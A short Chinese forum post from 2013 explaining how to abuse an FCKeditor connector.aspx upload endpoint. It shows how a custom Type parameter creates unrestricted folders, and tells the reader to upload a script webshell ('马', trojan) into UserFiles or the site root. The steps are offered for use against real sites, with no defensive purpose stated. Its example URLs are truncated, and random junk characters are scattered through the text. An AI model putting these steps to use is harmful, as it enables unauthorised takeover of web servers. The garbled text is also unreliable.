出现上传漏洞的地址是:
/ a* T# V+ y: B& v) ehttp://www.xxx.com/admin/FCKedit ... aspx/connector.aspx2 ^4 i T6 p) N* k5 t0 k m
打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:
# L& E5 a( E1 R, @1 a4 p5 ihttp://www.xxx.com/UserFiles/all/1.asa
/ a0 O# _' s( ?6 o2 M"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
+ e, ?4 h! V1 e. o6 A比如输入:3 A/ Z: s7 E8 o$ }: l' _" I7 ^
http://www.xxx.com/admin/FCKedit ... aspx/connector.aspx& e$ q1 F4 N P6 x; j- y8 ]5 g
所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了* g2 Y! M& h: K' F3 m
而如果这样输入:http://www.xxx.com/admin/FCKedit ... aspx/connector.aspx% n( o- Q6 F, J( |2 l+ ?' j3 T$ C
就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了. |
发表于 2013-3-29 19:30:05
收藏
支持
反对